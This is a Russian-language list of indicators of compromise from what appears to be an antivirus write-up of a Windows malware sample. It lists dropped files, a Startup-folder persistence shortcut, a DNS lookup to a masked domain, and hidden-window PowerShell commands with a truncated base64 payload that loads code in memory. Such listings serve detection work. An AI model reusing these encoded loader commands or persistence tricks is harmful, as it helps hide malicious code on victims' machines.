Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\chromium.ini.lnk
- %APPDATA%\uninstall.tool.v3.5.9.5657.exe
- %APPDATA%\id.js
- %TEMP%\nsged27.tmp
- %TEMP%\nsled47.tmp\repackme.gif
- %TEMP%\nsled47.tmp\newadvsplash.dll
- %TEMP%\nsled47.tmp\langdll.dll
- %HOMEPATH%\appdata\chromium.js
- DNS ASK si##j.space
- '%APPDATA%\uninstall.tool.v3.5.9.5657.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\ID.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...